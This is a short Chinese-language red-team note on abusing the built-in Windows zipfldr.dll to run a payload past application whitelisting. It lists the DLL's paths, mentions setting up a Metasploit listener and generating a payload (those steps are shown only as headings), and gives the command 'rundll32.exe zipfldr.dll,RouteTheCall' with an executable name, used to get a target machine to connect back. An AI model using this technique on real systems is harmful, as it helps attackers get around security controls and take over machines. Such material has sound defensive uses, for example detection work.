白名单执行payload之zipfldr.dll

简介

zipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件
所在路径已被系统添加PATH环境变量中，因此，zipfldr.dll命令可识别，但由于为dll文件，需调用rundll32.exe来执行


已添加环境变量，路径如下：
C:\Windows\System32\zipfldr.dll
C:\Windows\SysWOW64\zipfldr.dll

实际使用

msf设置监听如下：

生成payload如下：

目标终端运行如下，确认成功上线：
rundll32.exe zipfldr.dll,RouteTheCall 20210.exe